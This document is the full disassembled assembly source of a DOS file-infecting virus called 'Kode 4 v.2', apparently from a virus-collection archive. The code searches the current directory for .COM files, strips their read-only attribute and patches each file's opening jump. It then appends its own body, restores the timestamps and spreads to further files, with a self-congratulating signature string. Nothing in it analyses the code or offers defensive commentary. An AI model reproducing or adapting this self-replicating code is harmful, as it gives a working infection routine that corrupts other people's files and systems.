Kode 4 v.2
;
--------------------------------------------------------------------------
; Disassembled by FairWind / NRG , [email protected]
;
--------------------------------------------------------------------------
seg_a segment byte
public
assume cs:seg_a, ds:seg_a
org 100h
V_Length equ vend-vstart
KODE4 proc far
start label near
db 0E9h,00h,00h
vstart equ $
mov si,100h
mov di,102h
lback: inc di
mov ax,word ptr [si]
cmp word ptr [di],ax
jne lback
mov ax,word ptr [si+1]
cmp ax,word ptr [di+1]
je lout
jmp lback
lout: add di,3h
sub di,(v_length+100h)
mov si,di
lea di,temp_buff
add di,si
mov ax,word ptr [di]
mov cl,byte ptr [di+2]
mov di,100h
mov word ptr [di],ax
mov byte ptr [di+2],cl
mov ah,4Eh
mov dx,offset filename
add dx,si
int 21h
jnc back
jmp done
Back:
mov ah,43h
mov al,0
mov dx,9eh
int 21h
mov ah,43h
mov al,01
and cx,11111110b
int 21h
mov ax,3D02h
mov dx,9Eh
int 21h
jnc next
jmp done
next: mov bx,ax
mov ah,57h
mov al,0
int 21h
push cx
push dx
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
mov ah,3fh
mov cx,3
mov dx,offset temp_buff
add dx,si
int 21h
xor cx,cx
xor dx,dx
mov ax,4202h
int 21h
sub ax,3
push ax
mov di,offset temp_buff
add di,si
mov word ptr [j_code2+si],ax
cmp byte ptr [di],0e9h
jne infect
mov cx,word ptr [di+1]
pop ax
sub ax,v_length
cmp ax, cx
jne infect
jmp finish
infect:
xor cx,cx
xor dx,dx
mov ax,4200h
int 21h
mov ah,40h
mov cx,3
mov dx, offset j_code1
add dx,si
int 21h
xor cx,cx
xor dx,dx
mov ax, 4202h
int 21h
mov dx,offset vstart
add dx,si
mov cx,(vend-vstart)
mov ah,40h
int 21h
Finish: pop dx
pop cx
mov ah,57h
mov al,01h
int 21h
mov ah,3Eh
int 21h
mov ah,4Fh
int 21h
jc done
jmp back
done:
mov bp,100h
jmp bp
filename db "*.com",0
DATA db " -=+ Kode4 +=-, The one and ONLY!$"
j_code1 db 0e9h
j_code2 db 00h,00h
temp_buff db 0cdh,020h,090h ; CD 20 NOP
kode4 endp
vend equ $
seg_a ends
end start
